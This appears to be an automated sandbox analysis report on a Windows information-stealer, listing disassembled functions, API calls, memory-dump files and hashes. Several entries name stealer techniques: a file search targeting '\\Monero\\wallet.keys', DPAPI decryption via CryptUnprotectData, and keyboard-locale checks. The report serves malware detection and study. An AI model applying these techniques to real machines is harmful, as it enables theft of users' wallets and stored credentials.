                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E614B0,00E60C2A), ref: 00E4DAEB
                                  • StrCmpCA.SHLWAPI(?,00E614B4), ref: 00E4DB33
                                  • StrCmpCA.SHLWAPI(?,00E614B8), ref: 00E4DB49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E4DDCC
                                  • FindClose.KERNEL32(000000FF), ref: 00E4DDDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: bb28b6528cfd17811788b5df35271e0988a845b4095c88f331359d2110ed9bcb
                                  • Instruction ID: 3558f9f66e6ce82107d7833de88637138a912d89fe226760d328db9eb950a7e6
                                  • Opcode Fuzzy Hash: bb28b6528cfd17811788b5df35271e0988a845b4095c88f331359d2110ed9bcb
                                  • Instruction Fuzzy Hash: 74915472A0010497CB14FF70EC569ED77BCAB88301F449A69FD4AB7145EE349B4D8B92
                                  Function 012181E6 Relevance: 11.7, Strings: 8, Instructions: 1677COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ]o$0I?$G5Y'$\_{k$^V?$n3~$t&^${!qn
                                  • API String ID: 0-700155458
                                  • Opcode ID: d3e450c94ec49747832adf12c7499c8059aba9eaa0af27c2522bda211c9a1f66
                                  • Instruction ID: 1f6ba5c24933cba60d1c9135705c84f329be26c83fad3154877520c2c970371d
                                  • Opcode Fuzzy Hash: d3e450c94ec49747832adf12c7499c8059aba9eaa0af27c2522bda211c9a1f66
                                  • Instruction Fuzzy Hash: 3BB237F3A0C2049FE304AE2DEC8577ABBE9EF94320F1A453DE6C5C7744E93558018696
                                  Function 00E57B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,00E605AF), ref: 00E57BE1
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00E57BF9
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00E57C0D
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00E57C62
                                  • LocalFree.KERNEL32(00000000), ref: 00E57D22
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: 59feaa5f4452da3b9a5ad5b0a126daf2bbe9d38d7e258a0f73409ed5a5635ce4
                                  • Instruction ID: ada53029ecdc0b0ff7917a69cc2a2dad215df0fc9b4717590c0084e020d811ac
                                  • Opcode Fuzzy Hash: 59feaa5f4452da3b9a5ad5b0a126daf2bbe9d38d7e258a0f73409ed5a5635ce4
                                  • Instruction Fuzzy Hash: 8D414E71944218ABCB24DB54DC99BEEB3B4FF48701F104699E80972180DB342F89CFA1
                                  Function 00E4E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00E60D73), ref: 00E4E4A2
                                  • StrCmpCA.SHLWAPI(?,00E614F8), ref: 00E4E4F2
                                  • StrCmpCA.SHLWAPI(?,00E614FC), ref: 00E4E508
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E4EBDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 433455689-1173974218
                                  • Opcode ID: 533c7c4bd7d00b4b5ad22d18a881d83ee2b0467c6216090c59743dafb86e5274
                                  • Instruction ID: ac2b8470638e4babcf23546db16f34d57b2b9e668ee2d3dfabee1c9441eacca3
                                  • Opcode Fuzzy Hash: 533c7c4bd7d00b4b5ad22d18a881d83ee2b0467c6216090c59743dafb86e5274
                                  • Instruction Fuzzy Hash: 2C1246729101189ADB18FB60DC96EED73B9BF54301F445AB9B90A72081EF346F4DCB92
                                  Function 0121EEE2 Relevance: 9.2, Strings: 6, Instructions: 1715COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: "^[$$ ~$0G/?$Vaw{$d8u$_
                                  • API String ID: 0-2460952986
                                  • Opcode ID: dc8e94737695879acfc08a70c5039ce605f3829b1eb9b93813bfc12754c838e1
                                  • Instruction ID: d8a2ef726d853a272a36183916d5f434600a123dd70f7888a859ab9378c7ac12
                                  • Opcode Fuzzy Hash: dc8e94737695879acfc08a70c5039ce605f3829b1eb9b93813bfc12754c838e1
                                  • Instruction Fuzzy Hash: FAB23AF3A0C2049FE3046E2DEC8567AFBEAEF94320F1A453DE6C4D3744E97598058696
                                  Function 0121B889 Relevance: 9.2, Strings: 6, Instructions: 1652COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: AsWo$FoS$~|/$ik_$m,$:j
                                  • API String ID: 0-2283191893
                                  • Opcode ID: 7674ada3e99e8203aa6b70803612c715ea1f754f4f257e54981328c177f96e64
                                  • Instruction ID: 8e89f98f38a2becf0f07adbf1f3be46d4efa99509225b79717596d14cfe953d3
                                  • Opcode Fuzzy Hash: 7674ada3e99e8203aa6b70803612c715ea1f754f4f257e54981328c177f96e64
                                  • Instruction Fuzzy Hash: 66B2F6F360C2049FE304AE29EC8576AB7E9EF94320F1A493DEAC4C7744E67598018797
                                  Function 00E49AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E49AEF
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00E44EEE,00000000,?), ref: 00E49B01
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E49B2A
                                  • LocalFree.KERNEL32(?,?,?,?,00E44EEE,00000000,?), ref: 00E49B3F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID: N
                                  • API String ID: 4291131564-1689755984
                                  • Opcode ID: 1ad4cad4ed9ebc98dd22f4dd5dd78a1bf1dfbc2b51b2ba95aebc6151861280bc
                                  • Instruction ID: 8dd4471c838957abd0849225a64808e4fd7b5d9864a26e1dc81951be118a3c88
                                  • Opcode Fuzzy Hash: 1ad4cad4ed9ebc98dd22f4dd5dd78a1bf1dfbc2b51b2ba95aebc6151861280bc
                                  • Instruction Fuzzy Hash: 0E11A4B4240208EFEB10CF64D895FAA77B5FB89704F208059FA159B384C776A901CB54
                                  Function 01219D5C Relevance: 7.9, Strings: 5, Instructions: 1694COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 7%W$nP~$rV*c$us?V$}sl
                                  • API String ID: 0-367618750
                                  • Opcode ID: ec506795a10033a60362ee7ffc45f4d58072af18829bba4b9ecaac047bc00e4c
                                  • Instruction ID: 1074a998405f0bb2e265c39585dba27327992c8498666dd7089bd4b71c6c9d54
                                  • Opcode Fuzzy Hash: ec506795a10033a60362ee7ffc45f4d58072af18829bba4b9ecaac047bc00e4c
                                  • Instruction Fuzzy Hash: DBB229F36082109FE304AE2DEC8567AFBEAEFD4320F1A493DE6C5C7744E57598058692
                                  Function 012130B2 Relevance: 7.8, Strings: 5, Instructions: 1562COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ??o$-7u$\M(2$vb+s$zkWy
                                  • API String ID: 0-1090226411
                                  • Opcode ID: 7cd791347a6c92cc0bcf35e1b22451e6b47c98812094f66f23b4ed56939d4c26
                                  • Instruction ID: 3f0230c391c7160c0b5a05781a07260df6b563b231ff62c397b3dc19080a3d83
                                  • Opcode Fuzzy Hash: 7cd791347a6c92cc0bcf35e1b22451e6b47c98812094f66f23b4ed56939d4c26
                                  • Instruction Fuzzy Hash: 9FB2E4F3A0C204AFE704AE29EC8567AFBE5EF94320F16493DEAC583344E63558158797
                                  Function 00E4C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E4C871
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E4C87C
                                  • lstrcat.KERNEL32(?,00E60B46), ref: 00E4C943
                                  • lstrcat.KERNEL32(?,00E60B47), ref: 00E4C957
                                  • lstrcat.KERNEL32(?,00E60B4E), ref: 00E4C978
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: a04acdd14b0c9452e18d4c52223a29916fdda612d185e1866de3bbd203ab38e2
                                  • Instruction ID: 7aa8fffd51a8a2f6a523855f5765d473cba473af1a5b2e37edc5c11cb13c15c9
                                  • Opcode Fuzzy Hash: a04acdd14b0c9452e18d4c52223a29916fdda612d185e1866de3bbd203ab38e2
                                  • Instruction Fuzzy Hash: C941827590421AEFCB10DF90DC89BFEB7B8BB88304F1041A9E609B7284D7755A84CF91
                                  Function 00E47240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00E4724D
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E47254
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E47281
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00E472A4
                                  • LocalFree.KERNEL32(?), ref: 00E472AE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
